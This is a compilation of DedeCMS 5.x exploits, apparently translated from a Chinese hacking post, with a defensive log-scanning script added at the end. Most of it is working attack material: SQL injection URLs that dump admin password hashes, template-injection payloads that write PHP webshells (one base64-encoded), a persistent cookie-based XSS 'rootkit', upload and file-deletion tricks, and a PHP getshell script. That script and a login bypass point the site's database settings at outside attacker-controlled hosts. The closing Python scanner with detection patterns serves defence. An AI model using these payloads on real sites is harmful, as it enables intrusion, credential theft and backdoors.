Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php with password xiao, a one-line shell created directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy the URL below and open it; visiting it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers intercept URL-based XSS, so the XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=""
2. Close the browser; from then on, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (Zhimeng) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
The precondition for this vulnerability is that the backend path must be known.

Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member area, publish an article, upload an image, and then in attachment management replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

Zhimeng (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with its first 5 and last 7 characters removed, giving a 20-character MD5 password; to go further, remove 3 more from the front and 1 from the end to get the 16-character MD5.

Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Zhimeng (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits the error raised by a numeric overflow in a MySQL field value, together with the fact that DEDECMS records database error messages in a PHP file whose header contains no check.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
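The PoCs above all leave distinctive request patterns in a web server's access log. As an added, defender-side example that is not part of the original post, the following Python scanner matches those patterns; it assumes the Apache/Nginx combined log format, and the sample log lines and the 203.0.113.9 / 198.51.100.7 addresses are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/Nginx "combined" request line; only the URL (path + query string) is inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SQLI_RE = re.compile(r"union\s+(all\s+)?select\b|updatexml\s*\(", re.I)
PHP_RE = re.compile(r"\?>|\*/|\b(eval|phpinfo)\s*\(", re.I)
XSS_RE = re.compile(r"<script|\"\s*>|javascript:", re.I)


def _blob(params):
    """Decoded name=value pairs joined, so payloads placed in parameter names are seen too."""
    return " ".join(f"{n}={v}" for n, v in params)


# Rule name -> predicate(script_name, [(param, value), ...]); one rule per PoC class on this page.
RULES = {
    # _POST[GLOBALS][cfg_dbhost]=... on login.php, cfg_basedir=... on select_soft_post.php
    "config_variable_overwrite": lambda s, p: any(re.search(r"\bGLOBALS\b|^cfg_", n) for n, _ in p),
    # advancedsearch.php executing a caller-supplied sql= statement
    "advancedsearch_raw_sql": lambda s, p: s == "advancedsearch.php" and any(n == "sql" for n, _ in p),
    # login.php?gotopage= reflected XSS (the cookie-persisted "XSS rootkit")
    "gotopage_xss": lambda s, p: any(n == "gotopage" and XSS_RE.search(v) for n, v in p),
    # edit_face.php oldface=/uploads/../.. deletion, carbuyaction.php code=../../ inclusion
    "path_traversal": lambda s, p: any("../" in v for _, v in p),
    # rss.php (updatexml), feedback_js.php and infosearch.php (union select) injections
    "sql_injection": lambda s, p: bool(SQLI_RE.search(_blob(p))),
    # digg_frame.php mid=*/...?> smuggling PHP into data/mysql_error_trace.php
    "php_in_parameter": lambda s, p: bool(PHP_RE.search(_blob(p))),
    # fetching the error-trace file that the previous step turns into a webshell
    "error_trace_access": lambda s, p: s == "mysql_error_trace.php",
}


def analyse_target(target):
    """Names of every rule the request target triggers ([] for a clean request)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, check in RULES.items() if check(script, params)]


def scan_log(lines):
    """(ip, target, [rules]) for every parseable line that triggers at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rules = analyse_target(m["target"])
            if rules:
                hits.append((m["ip"], m["target"], rules))
    return hits


# Constructed sample log: this page's PoC URLs replayed against a fictitious site (RFC 5737 addresses).
_LINE = '203.0.113.9 - - [12/Jan/2011:10:00:%02d +0800] "GET %s HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
SAMPLE_LOG = [_LINE % (i, t) for i, t in enumerate([
    "/plus/advancedsearch.php?mid=1&keyword=dede",  # benign search, must not fire
    "/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60",
    "/dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.7",
    "/dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif",
    "/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,%28SELECT%20uname%20FROM%20dede_admin%29,1%29%23'][0]=1",
    "/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*",
    "/plus/digg_frame.php?mid=*/phpinfo()%3B?%3E",
    "/data/mysql_error_trace.php",
    "/plus/view.php?aid=2",  # benign article view, must not fire
])]

if __name__ == "__main__":
    for ip, target, rules in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(rules), target[:60])
```

Anything carried in a POST body (the mytag_js.php _COOKIE[GLOBALS] form, the select_soft_post.php cfg_* fields, the uploads_edit.php and article_edit.php forms) never appears in an access log, so those cases need request-body inspection at a WAF or inside the application itself.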